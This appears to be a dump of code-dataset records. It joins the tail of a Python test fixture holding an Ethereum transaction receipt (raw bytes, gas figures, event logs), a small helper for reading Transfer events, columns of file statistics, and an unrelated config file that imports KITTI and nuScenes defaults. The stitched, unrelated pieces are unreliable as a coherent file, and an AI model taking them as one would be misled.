b\x06\x99E\x97\xc1=\x83\x1e\xc7\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xdc\xd6\x01\x1fLk\x80\xe4p\xd9H\x7fXq\xa0\xcb\xa7\xc9?H\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x1fM\\\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02d\x08\x10\xb1\xf0\x100\x1d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xda\xc1\x7f\x95\x8d.\xe5#\xa2 b\x06\x99E\x97\xc1=\x83\x1e\xc7\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xc0*\xaa9\xb2#\xfe\x8d\n\x0e\\O'\xea\xd9\x08<ul\xc2\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00$\xf4ra\xb0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xda\xc1\x7f\x95\x8d.\xe5#\xa2 
b\x06\x99E\x97\xc1=\x83\x1e\xc7\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xc0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00B\x1c\xa1\xa7\xc1+\x19;h\xe6\xac=Bi\xb9\xc1\xfdu\x05\x1a\x01-\xb6>\xcd\x99\xd2\x17\xf7\xb8\xbc\x95\xba\xdbt\xa1\xc0~\x00F\xc5\xf9\x8f\x8b:\xcf\x1ft]\x1c\xc0\xb8\x95\x0e\xc8R\xba\x92\x9c\xa1G\x9cn\x02_\xf1\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x86\x95\x84\xcd\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x002-X\xb9\xe7Zi\x18\xf7\xe7\x84\x9a\xee\x0f\xf0\x93i\x97~\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00<\xf9\xca\xf5\x92_\xb4\xacg\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00",
"gas_limit": 1402309,
"gas_price": 95000000000,
"gas_used": 1045273,
"logs": [
{
"blockHash": HexBytes(
"0x509e2a7bc82fade6f91b7c1efb47f89940efad06661bc3d1d0e8bc37e4325428"
),
"address": "0xF14f0648435CF34f8bC800d4E71FF0Ba15bC52dD",
"logIndex": 136,
"data": "0x00000000000000000000000000000000000000000000000000479f69c6ac000000000000000000000000000000000000000000000000000000000000000000400000000000000000000000000000000000000000000000000000000000000b441cff79cd000000000000000000000000533c8844ba1922b88d892aca090df0cc0c292f1b00000000000000000000000000000000000000000000000000000000000000400000000000000000000000000000000000000000000000000000000000000ac4f708847b00000000000000000000000000000000000000000000000000000000000000800000000000000000000000004ddc2d193948926d02f9b1fe9e1daa0718270ed5000000000000000000000000f650c3d88d12db855b8bf7d11be6c55a4e07dcc90000000000000000000000000000000000000000000000000000000000000000000000000000000000000000dac17f958d2ee523a2206206994597c13d831ec7000000000000000000000000eeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeee000000000000000000000000000000000000000000000000000000051f4d5c0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000067a4a5343b74de28cc000000000000000000000000000003ba0319533c578527ae69bf7fa2d289f20b9b55c00000000000000000000000061935cbdd02287b511119ddb11aeb42f1593b7ef00000000000000000000000000000000000000000000000000000000000001200000000000000000000000000000000000000000068b0a6df6d303ae8900000000000000000000000000000000000000000000000000000000000000000008e8a6c3bf330000000000000000000000000000000000000000000000000000000000000060000000000000000000000000000000000000000000000000000000051f4d5c00000000000000000000000000000000000000000000000000000000000000078000000000000000000000000000000000000000000000000000000000000000020000000000000000000000000000000000000000000000000000000000000040000000000000000000000000000000000000000000000000000000000000026000000000000000000000000057845987c8c859d52931ee248d8d84ab10532407000000000000000000000000f14f0648435cf34f8bc800d4e71ff0ba15bc52dd000000000000000000000000100000000000000000000000000000000000001100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000026ac56ad607a6a00000000000000000000000000000000000000000000000000000000005209d0d7f00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000005fb4acca00000000000000000000000000000000000000000000000000000175d9c171a700000000000000000000000000000000000000000000000000000000000001c0000000000000000000000000000000000000000000000000000000000000064000000000000000000000000000000000000000000000000000000000000006a000000000000000000000000000000000000000000000000000000000000006a00000000000000000000000000000000000000000000000000000000000000024f47261b0000000000000000000000000c02aaa39b223fe8d0a0e5c4f27ead9083c756cc200000000000000000000000000000000000000000000000000000000000000000000000000000000c47b7094f378e54347e281aab170e8cca69d880a000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002640810b1f010301d000000000000000000000000000000000000000000000000000000051f4d5c0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000005fb4c8876573a792d8faba391a985b937c96dfe336f8022285a4e5d5fa2b07c3eef9834600000000000000000000000000000000000000000000000000000000000001c00000000000000000000000000000000000000000000000000000000000000420
000000000000000000000000000000000000000000000000000000000000048000000000000000000000000000000000000000000000000000000000000004800000000000000000000000000000000000000000000000000000000000000224dc1600f3000000000000000000000000c02aaa39b223fe8d0a0e5c4f27ead9083c756cc2000000000000000000000000c47b7094f378e54347e281aab170e8cca69d880a000000000000000000000000000000000000000000000000000000000000006000000000000000000000000000000000000000000000000000000000000001a0000000000000000000000000dac17f958d2ee523a2206206994597c13d831ec7000000000000000000000000000000000000000000000000000000000000004000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000020000000000000000000000000dcd6011f4c6b80e470d9487f5871a0cba7c93f48000000000000000000000000000000000000000000000000000000051f4d5c00000000000000000000000000000000000000000000000002640810b1f010301d0000000000000000000000000000000000000000000000000000000000000080000000000000000000000000000000000000000000000000000000000000008000000000000000000000000000000000000000000000000000000000000000200000000000000000000000000000000000000000000000000000000000000002000000000000000000000000dac17f958d2ee523a2206206994597c13d831ec7000000000000000000000000c02aaa39b223fe8d0a0e5c4f27ead9083c756cc2000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000024f47261b0000000000000000000000000dac17f958d2ee523a2206206994597c13d831ec70000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000000000000000000000000000000000000000000000000000000000004000000000000000000000000000000000000000000000000000000000000000c000000000000000000000000000000000000000000000000000000000000000421ca1a7c12b193b68e6ac3d4269b9c1fd75051a012db63ecd99d217f7b8bc95badb74a1c07e0046c5f98f8b3acf1f745d1cc0b8950ec852ba929ca1479c6e025ff10300000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010400000000000000000000000000000000000000000000000000000000000000869584cd000000000000000000000000322d58b9e75a6918f7e7849aee0ff09369977e0800000000000000000000000000000000000000000000003cf9caf5925fb4ac6700000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000",
"removed": False,
"topics": [
HexBytes("0x1cff79cd00000000000000000000000000000000000000000000000000000000"),
HexBytes("0x0000000000000000000000005668ead1edb8e2a4d724c8fb9cb5ffeabeb422dc"),
HexBytes("0x000000000000000000000000533c8844ba1922b88d892aca090df0cc0c292f1b"),
HexBytes("0x0000000000000000000000000000000000000000000000000000000000000040"),
],
"blockNumber": 11279968,
"transactionIndex": 60,
"transactionHash": HexBytes(
"0x0537316f37627655b7fe5e50e23f71cd835b377d1cde4226443c94723d036e32"
),
},
{
"blockHash": HexBytes(
"0x509e2a7bc82fade6f91b7c1efb47f89940efad06661bc3d1d0e8bc37e4325428"
),
"address": "0xf650C3d88D12dB855b8bf7D11Be6C55A4e07dCC9",
"logIndex": 137,
"data": "0x0000000000000000000000000000000000000000000000000000088ee804439c00000000000000000000000000000000000000000000000000000000043f9e830000000000000000000000000000000000000000000000000e80cfd37ffe100800000000000000000000000000000000000000000000000000001d139751603c",
"removed": False,
"topics": [
HexBytes("0x4dec04e750ca11537cabcd8a9eab06494de08da3735bc8871cd41250e190bc04")
],
"blockNumber": 11279968,
"transactionIndex": 60,
"transactionHash": HexBytes(
"0x0537316f37627655b7fe5e50e23f71cd835b377d1cde4226443c94723d036e32"
),
},
{
"blockHash": HexBytes(
"0x509e2a7bc82fade6f91b7c1efb47f89940efad06661bc3d1d0e8bc37e4325428"
),
"address": "0xc00e94Cb662C3520282E6f5717214004A7f26888",
"logIndex": 138,
"data": "0x000000000000000000000000000000000000000000000000064fdb83b0307d50",
"removed": False,
"topics": [
HexBytes("0xddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef"),
HexBytes("0x0000000000000000000000003d9819210a31b4961b30ef54be2aed79b9c9cd3b"),
HexBytes("0x000000000000000000000000f14f0648435cf34f8bc800d4e71ff0ba15bc52dd"),
],
"blockNumber": 11279968,
"transactionIndex": 60,
"transactionHash": HexBytes(
"0x0537316f37627655b7fe5e50e23f71cd835b377d1cde4226443c94723d036e32"
),
},
{
"blockHash": HexBytes(
"0x509e2a7bc82fade6f91b7c1efb47f89940efad06661bc3d1d0e8bc37e4325428"
),
"address": "0x3d9819210A31b4961b30EF54bE2aeD79B9c9Cd3B",
"logIndex": 139,
"data": "0x000000000000000000000000000000000000000000000000064fdb83b0307d50000000000000000000000000000f81764ab6c0f546d710606e89bc296ba11e96",
"removed": False,
"topics": [
HexBytes("0x1fc3ecc087d8d2d15e23d0032af5a47059c3892d003d8e139fdcb6bb327c99a6"),
HexBytes("0x000000000000000000000000f650c3d88d12db855b8bf7d11be6c55a4e07dcc9"),
HexBytes("0x000000000000000000000000f14f0648435cf34f8bc800d4e71ff0ba15bc52dd"),
],
"blockNumber": 11279968,
"transactionIndex": 60,
"transactionHash": HexBytes(
"0x0537316f37627655b7fe5e50e23f71cd835b377d1cde4226443c94723d036e32"
),
},
{
"blockHash": HexBytes(
"0x509e2a7bc82fade6f91b7c1efb47f89940efad06661bc3d1d0e8bc37e4325428"
),
"address": "0xdAC17F958D2ee523a2206206994597C13D831ec7",
"logIndex": 140,
"data": "0x000000000000000000000000000000000000000000000000000000051f4d5c00",
"removed": False,
"topics": [
HexBytes("0xddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef"),
HexBytes("0x000000000000000000000000f650c3d88d12db855b8bf7d11be6c55a4e07dcc9"),
HexBytes("0x000000000000000000000000f14f0648435cf34f8bc800d4e71ff0ba15bc52dd"),
],
"blockNumber": 11279968,
"transactionIndex": 60,
"transactionHash": HexBytes(
"0x0537316f37627655b7fe5e50e23f71cd835b377d1cde4226443c94723d036e32"
),
},
{
"blockHash": HexBytes(
"0x509e2a7bc82fade6f91b7c1efb47f89940efad06661bc3d1d0e8bc37e4325428"
),
"address": "0xf650C3d88D12dB855b8bf7D11Be6C55A4e07dCC9",
"logIndex": 141,
"data": "0x000000000000000000000000f14f0648435cf34f8bc800d4e71ff0ba15bc52dd000000000000000000000000000000000000000000000000000000051f4d5c000000000000000000000000000000000000000000000000000000002bee8c02a100000000000000000000000000000000000000000000000000001d18b69ebc3c",
"removed": False,
"topics": [
HexBytes("0x13ed6866d4e1ee6da46f845c46d7e54120883d75c5ea9a2dacc1c4ca8984ab80")
],
"blockNumber": 11279968,
"transactionIndex": 60,
"transactionHash": HexBytes(
"0x0537316f37627655b7fe5e50e23f71cd835b377d1cde4226443c94723d036e32"
),
},
{
"blockHash": HexBytes(
"0x509e2a7bc82fade6f91b7c1efb47f89940efad06661bc3d1d0e8bc37e4325428"
),
"address": "0xdAC17F958D2ee523a2206206994597C13D831ec7",
"logIndex": 142,
"data": "0x0000000000000000000000000000000000000000000000000000000003473bc0",
"removed": False,
"topics": [
HexBytes("0xddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef"),
HexBytes("0x000000000000000000000000f14f0648435cf34f8bc800d4e71ff0ba15bc52dd"),
HexBytes("0x000000000000000000000000322d58b9e75a6918f7e7849aee0ff09369977e08"),
],
"blockNumber": 11279968,
"transactionIndex": 60,
"transactionHash": HexBytes(
"0x0537316f37627655b7fe5e50e23f71cd835b377d1cde4226443c94723d036e32"
),
},
{
"blockHash": HexBytes(
"0x509e2a7bc82fade6f91b7c1efb47f89940efad06661bc3d1d0e8bc37e4325428"
),
"address": "0xdAC17F958D2ee523a2206206994597C13D831ec7",
"logIndex": 143,
"data": "0x0000000000000000000000000000000000000000000000000000000000000000",
"removed": False,
"topics": [
HexBytes("0x8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925"),
HexBytes("0x000000000000000000000000f14f0648435cf34f8bc800d4e71ff0ba15bc52dd"),
HexBytes("0x00000000000000000000000095e6f48254609a6ee006f7d493c8e5fb97094cef"),
],
"blockNumber": 11279968,
"transactionIndex": 60,
"transactionHash": HexBytes(
"0x0537316f37627655b7fe5e50e23f71cd835b377d1cde4226443c94723d036e32"
),
},
{
"blockHash": HexBytes(
"0x509e2a7bc82fade6f91b7c1efb47f89940efad06661bc3d1d0e8bc37e4325428"
),
"address": "0xdAC17F958D2ee523a2206206994597C13D831ec7",
"logIndex": 144,
"data": "0x000000000000000000000000000000000000000000000000000000051c062040",
"removed": False,
"topics": [
HexBytes("0x8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925"),
HexBytes("0x000000000000000000000000f14f0648435cf34f8bc800d4e71ff0ba15bc52dd"),
HexBytes("0x00000000000000000000000095e6f48254609a6ee006f7d493c8e5fb97094cef"),
],
"blockNumber": 11279968,
"transactionIndex": 60,
"transactionHash": HexBytes(
"0x0537316f37627655b7fe5e50e23f71cd835b377d1cde4226443c94723d036e32"
),
},
{
"blockHash": HexBytes(
"0x509e2a7bc82fade6f91b7c1efb47f89940efad06661bc3d1d0e8bc37e4325428"
),
"address": "0x61935CbDd02287B511119DDb11Aeb42F1593b7Ef",
"logIndex": 145,
"data": "0x000000000000000000000000000000000000000000000000000000000000016000000000000000000000000000000000000000000000000000000000000001c000000000000000000000000000000000000000000000000000000000000002200000000000000000000000000000000000000000000000000000000000000240000000000000000000000000f14f0648435cf34f8bc800d4e71ff0ba15bc52dd000000000000000000000000f14f0648435cf34f8bc800d4e71ff0ba15bc52dd000000000000000000000000000000000000000000000002689b8d5f98f1cbc8000000000000000000000000000000000000000000000000000000051c062040000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000017a023c7c1a0000000000000000000000000000000000000000000000000000000000000000024f47261b0000000000000000000000000c02aaa39b223fe8d0a0e5c4f27ead9083c756cc2000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000024f47261b0000000000000000000000000dac17f958d2ee523a2206206994597c13d831ec70000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000",
"removed": False,
"topics": [
HexBytes("0x6869791f0a34781b29882982cc39e882768cf2c96995c2a110c577c53bc932d5"),
HexBytes("0x00000000000000000000000057845987c8c859d52931ee248d8d84ab10532407"),
HexBytes("0x0000000000000000000000001000000000000000000000000000000000000011"),
HexBytes("0x37593fc865d3f3712f13e5a5c86cca53f1728ed4484809675840433bcc9c5a30"),
],
"blockNumber": 11279968,
"transactionIndex": 60,
"transactionHash": HexBytes(
"0x0537316f37627655b7fe5e50e23f71cd835b377d1cde4226443c94723d036e32"
),
},
{
"blockHash": HexBytes(
"0x509e2a7bc82fade6f91b7c1efb47f89940efad06661bc3d1d0e8bc37e4325428"
),
"address": "0xdAC17F958D2ee523a2206206994597C13D831ec7",
"logIndex": 146,
"data": "0x000000000000000000000000000000000000000000000000000000051c062040",
"removed": False,
"topics": [
HexBytes("0xddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef"),
HexBytes("0x000000000000000000000000f14f0648435cf34f8bc800d4e71ff0ba15bc52dd"),
HexBytes("0x00000000000000000000000057845987c8c859d52931ee248d8d84ab10532407"),
],
"blockNumber": 11279968,
"transactionIndex": 60,
"transactionHash": HexBytes(
"0x0537316f37627655b7fe5e50e23f71cd835b377d1cde4226443c94723d036e32"
),
},
{
"blockHash": HexBytes(
"0x509e2a7bc82fade6f91b7c1efb47f89940efad06661bc3d1d0e8bc37e4325428"
),
"address": "0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2",
"logIndex": 147,
"data": "0x000000000000000000000000000000000000000000000002689b8d5f98f1cbc8",
"removed": False,
"topics": [
HexBytes("0xddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef"),
HexBytes("0x00000000000000000000000057845987c8c859d52931ee248d8d84ab10532407"),
HexBytes("0x000000000000000000000000f14f0648435cf34f8bc800d4e71ff0ba15bc52dd"),
],
"blockNumber": 11279968,
"transactionIndex": 60,
"transactionHash": HexBytes(
"0x0537316f37627655b7fe5e50e23f71cd835b377d1cde4226443c94723d036e32"
),
},
{
"blockHash": HexBytes(
"0x509e2a7bc82fade6f91b7c1efb47f89940efad06661bc3d1d0e8bc37e4325428"
),
"address": "0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2",
"logIndex": 148,
"data": "0x000000000000000000000000000000000000000000000002689b8d5f98f1cbc8",
"removed": False,
"topics": [
HexBytes("0x7fcf532c15f0a6db0bd6d0e038bea71d30d808c7d98cb3bf7268a95bf5081b65"),
HexBytes("0x000000000000000000000000f14f0648435cf34f8bc800d4e71ff0ba15bc52dd"),
],
"blockNumber": 11279968,
"transactionIndex": 60,
"transactionHash": HexBytes(
"0x0537316f37627655b7fe5e50e23f71cd835b377d1cde4226443c94723d036e32"
),
},
{
"blockHash": HexBytes(
"0x509e2a7bc82fade6f91b7c1efb47f89940efad06661bc3d1d0e8bc37e4325428"
),
"address": "0x4Ddc2D193948926D02f9B1fE9e1daa0718270ED5",
"logIndex": 149,
"data": "0x00000000000000000000000000000000000000000000000000086079fb32a6440000000000000000000000000000000000000000000000000e74838b38dfff90000000000000000000000000000000000000000000000ad7de5bcfee7eb6d2da",
"removed": False,
"topics": [
HexBytes("0x875352fb3fadeb8c0be7cbbe8ff761b308fa7033470cd0287f02f3436fd76cb9")
],
"blockNumber": 11279968,
"transactionIndex": 60,
"transactionHash": HexBytes(
"0x0537316f37627655b7fe5e50e23f71cd835b377d1cde4226443c94723d036e32"
),
},
{
"blockHash": HexBytes(
"0x509e2a7bc82fade6f91b7c1efb47f89940efad06661bc3d1d0e8bc37e4325428"
),
"address": "0xc00e94Cb662C3520282E6f5717214004A7f26888",
"logIndex": 150,
"data": "0x000000000000000000000000000000000000000000000000008bd386c2ed4798",
"removed": False,
"topics": [
HexBytes("0xddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef"),
HexBytes("0x0000000000000000000000003d9819210a31b4961b30ef54be2aed79b9c9cd3b"),
HexBytes("0x000000000000000000000000f14f0648435cf34f8bc800d4e71ff0ba15bc52dd"),
],
"blockNumber": 11279968,
"transactionIndex": 60,
"transactionHash": HexBytes(
"0x0537316f37627655b7fe5e50e23f71cd835b377d1cde4226443c94723d036e32"
),
},
{
"blockHash": HexBytes(
"0x509e2a7bc82fade6f91b7c1efb47f89940efad06661bc3d1d0e8bc37e4325428"
),
"address": "0x3d9819210A31b4961b30EF54bE2aeD79B9c9Cd3B",
"logIndex": 151,
"data": "0x000000000000000000000000000000000000000000000000008bd386c2ed479800000000000000000000000000000b68525e31895cf9cf5c67d3bdec9b7aef76",
"removed": False,
"topics": [
HexBytes("0x2caecd17d02f56fa897705dcc740da2d237c373f70686f4e0d9bd3bf0400ea7a"),
HexBytes("0x0000000000000000000000004ddc2d193948926d02f9b1fe9e1daa0718270ed5"),
HexBytes("0x000000000000000000000000f14f0648435cf34f8bc800d4e71ff0ba15bc52dd"),
],
"blockNumber": 11279968,
"transactionIndex": 60,
"transactionHash": HexBytes(
"0x0537316f37627655b7fe5e50e23f71cd835b377d1cde4226443c94723d036e32"
),
},
{
"blockHash": HexBytes(
"0x509e2a7bc82fade6f91b7c1efb47f89940efad06661bc3d1d0e8bc37e4325428"
),
"address": "0x4Ddc2D193948926D02f9B1fE9e1daa0718270ED5",
"logIndex": 152,
"data": "0x000000000000000000000000f14f0648435cf34f8bc800d4e71ff0ba15bc52dd0000000000000000000000000000000000000000000000026883ed3bd1302bc800000000000000000000000000000000000000000000000000000033a46a6672",
"removed": False,
"topics": [
HexBytes("0x4c209b5fc8ad50758f13e2e1088ba56a560dff690a1c6fef26394f4c03821c4f")
],
"blockNumber": 11279968,
"transactionIndex": 60,
"transactionHash": HexBytes(
"0x0537316f37627655b7fe5e50e23f71cd835b377d1cde4226443c94723d036e32"
),
},
{
"blockHash": HexBytes(
"0x509e2a7bc82fade6f91b7c1efb47f89940efad06661bc3d1d0e8bc37e4325428"
),
"address": "0x4Ddc2D193948926D02f9B1fE9e1daa0718270ED5",
"logIndex": 153,
"data": "0x00000000000000000000000000000000000000000000000000000033a46a6672",
"removed": False,
"topics": [
HexBytes("0xddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef"),
HexBytes("0x0000000000000000000000004ddc2d193948926d02f9b1fe9e1daa0718270ed5"),
HexBytes("0x000000000000000000000000f14f0648435cf34f8bc800d4e71ff0ba15bc52dd"),
],
"blockNumber": 11279968,
"transactionIndex": 60,
"transactionHash": HexBytes(
"0x0537316f37627655b7fe5e50e23f71cd835b377d1cde4226443c94723d036e32"
),
},
{
"blockHash": HexBytes(
"0x509e2a7bc82fade6f91b7c1efb47f89940efad06661bc3d1d0e8bc37e4325428"
),
"address": "0x5c55B921f590a89C1Ebe84dF170E655a82b62126",
"logIndex": 154,
"data": "0x00000000000000000000000000000000000000000000000000000000000000200000000000000000000000000000000000000000000000000000000000000080000000000000000000000000000000000000000000000000000000051c0620400000000000000000000000000000000000000000000000026883ed3bd1302bc8000000000000000000000000eeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeee000000000000000000000000dac17f958d2ee523a2206206994597c13d831ec7",
"removed": False,
"topics": [
HexBytes("0xa21bd02d37a839b5f9b81157b445649b4115e939611690d8a93b46bdb035a664"),
HexBytes("0x000000000000000000000000f14f0648435cf34f8bc800d4e71ff0ba15bc52dd"),
HexBytes("0x0000000000000000000000005668ead1edb8e2a4d724c8fb9cb5ffeabeb422dc"),
HexBytes("0x66688ffd4cb9146843859636430609f5de9141fe8f1ea0544ac5932d715436ef"),
],
"blockNumber": 11279968,
"transactionIndex": 60,
"transactionHash": HexBytes(
"0x0537316f37627655b7fe5e50e23f71cd835b377d1cde4226443c94723d036e32"
),
},
],
"nonce": 1153,
"receiver": "0xF14f0648435CF34f8bC800d4E71FF0Ba15bC52dD",
"required_confirmations": 0,
"sender": "0x5668EAd1eDB8E2a4d724C8fb9cB5fFEabEB422dc",
"status": TransactionStatusEnum.NO_ERROR,
"txn_hash": "0x0537316f37627655b7fe5e50e23f71cd835b377d1cde4226443c94723d036e32",
"value": 20160000000000000,
}
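Several of the logs above are ERC-20 Transfer events: their topic0 is keccak256("Transfer(address,address,uint256)"). A minimal sketch for pulling them out of the fixture (the helper and its use are illustrative, not part of the test data):

from hexbytes import HexBytes

TRANSFER_TOPIC = HexBytes(
    "0xddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef"
)

def iter_transfers(receipt_dict):
    # Yield (token, sender, receiver, amount) for every ERC-20 Transfer log.
    for log in receipt_dict["logs"]:
        if log["topics"] and log["topics"][0] == TRANSFER_TOPIC:
            # The indexed from/to addresses sit in the last 20 bytes of
            # topics 1 and 2; the uint256 amount is the log's data field.
            sender = "0x" + bytes(log["topics"][1][-20:]).hex()
            receiver = "0x" + bytes(log["topics"][2][-20:]).hex()
            yield log["address"], sender, receiver, int(log["data"], 16)

# for token, src, dst, amount in iter_transfers(MAINNET_RECEIPT_DICT):
#     print(token, src, "->", dst, amount)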
| 75.767464
| 10,939
| 0.471223
| 7,770
| 237,531
| 14.326641
| 0.091377
| 0.116747
| 0.169946
| 0.219695
| 0.60717
| 0.603919
| 0.595807
| 0.564841
| 0.550755
| 0.548555
| 0
| 0.564434
| 0.470995
| 237,531
| 3,134
| 10,940
| 75.79164
| 0.321468
| 0.000042
| 0
| 0.776501
| 0
| 0.000958
| 0.41584
| 0.348642
| 0
| 1
| 0.311377
| 0
| 0
| 1
| 0
| false
| 0
| 0.001277
| 0
| 0.001277
| 0
| 0
| 0
| 1
| null | 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
ac3eed2a0f1b9b134fe546ec71b71a96c23079f0
| 85
|
py
|
Python
|
smoke/config/__init__.py
|
dashidhy/SMOKE
|
724876443db90bbdca8f942515e881993b3f47b2
|
[
"MIT"
] | 5
|
2020-08-28T23:38:39.000Z
|
2020-08-31T17:00:56.000Z
|
smoke/config/__init__.py
|
Jike-u/SMOKE
|
724876443db90bbdca8f942515e881993b3f47b2
|
[
"MIT"
] | null | null | null |
smoke/config/__init__.py
|
Jike-u/SMOKE
|
724876443db90bbdca8f942515e881993b3f47b2
|
[
"MIT"
] | 3
|
2020-08-28T23:51:34.000Z
|
2021-04-18T03:32:39.000Z
|
from .defaults_kitti import _C as cfg_kitti
from .defaults_nusc import _C as cfg_nusc
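Usage sketch for the two re-exports above, assuming (as the `_C` naming convention suggests) that the defaults are yacs-style CfgNode objects; the YAML filename is hypothetical:

from smoke.config import cfg_kitti

cfg = cfg_kitti.clone()                 # work on a copy, keep the defaults intact
cfg.merge_from_file("experiment.yaml")  # hypothetical per-experiment override
cfg.freeze()                            # make the resolved config read-only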
| 42.5
| 43
| 0.847059
| 16
| 85
| 4.125
| 0.5
| 0.363636
| 0.272727
| 0.363636
| 0
| 0
| 0
| 0
| 0
| 0
| 0
